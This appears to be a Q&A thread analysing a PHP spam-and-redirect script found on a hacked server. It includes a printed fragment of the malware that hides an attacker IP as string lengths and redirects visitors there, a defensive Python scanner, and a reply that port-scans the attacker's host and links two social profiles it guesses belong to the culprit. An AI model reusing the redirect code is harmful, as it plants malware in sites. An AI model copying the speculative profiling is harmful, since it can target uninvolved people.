PHP malware on server - but helpless in identifying the malicious code

(I haven't gone over the code, I'm speculating because your description fits the modus of some malware I've seen in the past.)

It's probably a bot that is trying to build a network of backlinks to a known group of web assets.

Basically they find a vulnerable site and pop it. From there the script does a search to find which of the attacker's assets are currently ranking highest (or lowest) and haven't been penalized by Google/et al. yet.

They promote their assets further by implanting top keywords and links to those sites into an HTML document that gets served from your domain. Now when Google indexes your site, they see you are endorsing their sites and they rank even higher in the search results.

It's pretty clever.

It's toxic to you though because when Google penalizes spam farms, they also penalize sites that link to them. Your SEO will probably take a hit if/when judgment day comes. Remediate this ASAP.


Well, I'll give you some more detail:

Note, this is not malware that is trying to break deeper into your system; it is a script that makes someone (Italian, I guess) earn money using your server in 2 ways (at your cost):

  • If it is a bot (a search bot) that is doing the request, it will perform a few requests promoting the keyword: "1 euro terno su tutte vincita" and it will print a shuffle of words taken from the results. So they are promoting some lotto sites from your server IP.

These are the base URLs:

# https://www.google.com/search?q=1 euro terno su tutte vincita&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X
# http://search.yahoo.com/search?p=1 euro terno su tutte vincita
# http://www.ask.com/web?q=1 euro terno su tutte vincita&qsrc=11&adt=1&o=0&l=dir&page=$page
  • If it is not a bot, if it is a good user agent, the script will redirect the user's browser to another compromised server, but this time to a porn ad network.

There's a hidden IP in the script (in the dots):

  • IP: 37.1.211.206
  • COUNTRY: US (USA)


$adr1 = ".....................................";
$adr2 = ".";
$adr3 = "...................................................................................................................................................................................................................";
$adr4 = "..............................................................................................................................................................................................................";
// get it from the length of the strings, not the best way to hide something ^^
// the four lengths joined with "." give the IP (37.1.211.206 here)
$ard = strlen($adr1) . "." . strlen($adr2) . "." . strlen($adr3) . "." . strlen($adr4);
// echo $ard;

And the other part is just joining the strings and doing this request: http://37.1.211.206/input/?mark=20160624-(SERVER_NAME)

if (!@$isbot) { // not a search bot: send the real visitor away
    $s = dirname($_SERVER['PHP_SELF']);
    if ($s == '\\' | $s == '/') {
        $s = ('');
    }
    $s = $_SERVER['SERVER_NAME'] . $s;
    header("Location: http://$ard/input/?mark=20160624-$s");
    exit;
}

At the end the server at 37.1.211.206 will save your server's ID and redirect you to a random porn ad server.
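The two tricks described in this answer (an IP hidden as the lengths of dot-only strings, and a header("Location: ...") built from that variable) are easy to spot mechanically once you know the pattern. The scanner below is an added example written for this thread, not code from the poster or from the malware; it works on a constructed PHP sample that mirrors the posted script but decodes to the RFC 5737 test address 198.51.100.7 rather than the real host, and every function and regex name in it is my own.

```python
"""Triage helper: find strlen()-of-dots hidden IPs and the redirect that uses them.

Point scan_source() at the text of a suspicious PHP file. It reports which
variable the dot strings rebuild, the IP they decode to, and any
header("Location: http://$var/...") that sends visitors there.
"""
import re
import sys
from typing import Dict, List

# $adr1 = "......";  (single or double quotes, dots only)
DOT_ASSIGN = re.compile(r'\$(\w+)\s*=\s*(["\'])(\.+)\2\s*;')
# $ard = strlen($a) . "." . strlen($b) . "." . strlen($c) . "." . strlen($d);
STRLEN_JOIN = re.compile(
    r'\$(\w+)\s*=\s*((?:strlen\(\$\w+\)\s*\.\s*"\."\s*\.\s*)+strlen\(\$\w+\))\s*;')
STRLEN_VAR = re.compile(r'strlen\(\$(\w+)\)')
# header("Location: http://$ard/...") -- captures the URL template and the variable
LOCATION_HDR = re.compile(r'header\(\s*["\']Location:\s*(https?://\$(\w+)[^"\']*)["\']')


def dot_lengths(php_src: str) -> Dict[str, int]:
    """Map each dot-only string variable to the number of dots it holds."""
    return {name: len(dots) for name, _quote, dots in DOT_ASSIGN.findall(php_src)}


def decode_hidden_ips(php_src: str) -> Dict[str, str]:
    """Map each strlen()-join variable to the dotted IPv4 it evaluates to.

    Only four-part joins whose every operand is a dot string and whose
    lengths fit in an octet are reported; anything else is left alone.
    """
    lengths = dot_lengths(php_src)
    found = {}
    for target, expr in STRLEN_JOIN.findall(php_src):
        parts = STRLEN_VAR.findall(expr)
        if len(parts) != 4 or any(p not in lengths for p in parts):
            continue
        octets = [lengths[p] for p in parts]
        if all(0 <= o <= 255 for o in octets):
            found[target] = ".".join(str(o) for o in octets)
    return found


def find_redirects(php_src: str) -> List[dict]:
    """List Location headers built from a variable, resolved where possible."""
    ips = decode_hidden_ips(php_src)
    return [{"var": var, "template": url, "resolved": ips.get(var)}
            for url, var in LOCATION_HDR.findall(php_src)]


def scan_source(php_src: str) -> List[str]:
    """Human-readable findings for one PHP source text."""
    findings = [f"hidden IP: ${var} = {ip}" for var, ip in decode_hidden_ips(php_src).items()]
    for hit in find_redirects(php_src):
        where = hit["resolved"] or "(unresolved)"
        findings.append(f"redirect via ${hit['var']} -> {where}  [{hit['template']}]")
    return findings


# Constructed sample in the shape of the posted script; decodes to a TEST-NET-2
# address (198.51.100.7) so nothing here points at a live host.
SAMPLE_PHP = (
    '<?php\n'
    f'$adr1 = "{"." * 198}";\n'
    f'$adr2 = "{"." * 51}";\n'
    f'$adr3 = "{"." * 100}";\n'
    f'$adr4 = "{"." * 7}";\n'
    '$ard = strlen($adr1) . "." . strlen($adr2) . "." . strlen($adr3) . "." . strlen($adr4);\n'
    'if (!@$isbot) {\n'
    "    $s = $_SERVER['SERVER_NAME'];\n"
    '    header("Location: http://$ard/input/?mark=20160624-$s");\n'
    '    exit;\n'
    '}\n'
)

if __name__ == "__main__":
    # Usage: python scan_dots.py [file.php ...]; with no arguments the sample is scanned.
    sources = [open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]] or [SAMPLE_PHP]
    for src in sources:
        for line in scan_source(src) or ["no dot-string IP or variable redirect found"]:
            print(line)
```

Run it over the files your grep turned up (or over the whole webroot) and treat any hit as confirmation that the file is the dropper, then check the same file's bot/user-agent branch for the keyword-stuffing half. The regexes are deliberately narrow so they do not fire on ordinary PHP; a variant that hides the address some other way will need a new pattern, which is why the decoder is kept separate from the redirect finder.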


Use the IP address to serve justice on this script kiddie.

A traceroute to his IP from here (local hops removed):

  3    17 ms    17 ms    17 ms  be4066.ccr22.yyz02.atlas.cogentco.com [38.122.69.117]
  4    23 ms    24 ms    23 ms  be2994.ccr22.cle04.atlas.cogentco.com [154.54.31.233]
  5    31 ms    30 ms    31 ms  be2718.ccr42.ord01.atlas.cogentco.com [154.54.7.129]
  6    32 ms    31 ms    31 ms  be2248.ccr22.ord03.atlas.cogentco.com [154.54.5.158]
  7    32 ms    32 ms    32 ms  be2617.rcr12.b002281-5.ord03.atlas.cogentco.com [154.54.40.94]
  8    31 ms    37 ms    31 ms  38.122.181.114
  9    31 ms    33 ms    31 ms  37.1.209.2
 10    32 ms    32 ms    31 ms  37.1.211.206

Reverse DNS lookup on the last 3 hosts reveals nothing further directly, except if you check the whole subnets:

38.122.181.113  te0-0-0-2.rcr12.b002281-5.ord03.atlas.cogentco.com

The subnet appears to be customer endpoints for the Cogent Communications ISP. If we quickly port scan the attacker's server, we see only 22/ssh and 80/http open. That strongly suggests a Linux box, or a router. The webpage on the server appears to be the fresh install page for Apache. Going to the script in the code first redirects to the domain hstraffa.com, and then to a third-party porn site. A quick rake of hstraffa.com's social presence reveals only 2 Google+ likes. Here is one (WARNING: minimal but present graphic content) https://plus.google.com/105307781761317547299 and another: https://plus.google.com/115324666314038607739 . They appear to be Indian names, and a human being appears to be behind it all. A not very skilled script kiddie trying to monetize porn ads.

I would just take all of this, with your own investigation results (PHP scripts and server logs related to the incident), and contact the security officer at Cogent Communications. Let them take care of it.

You do however need to clean your own side, and I would recommend a fresh server install if you cannot figure out how they got in. Next intrusion might not be so benign...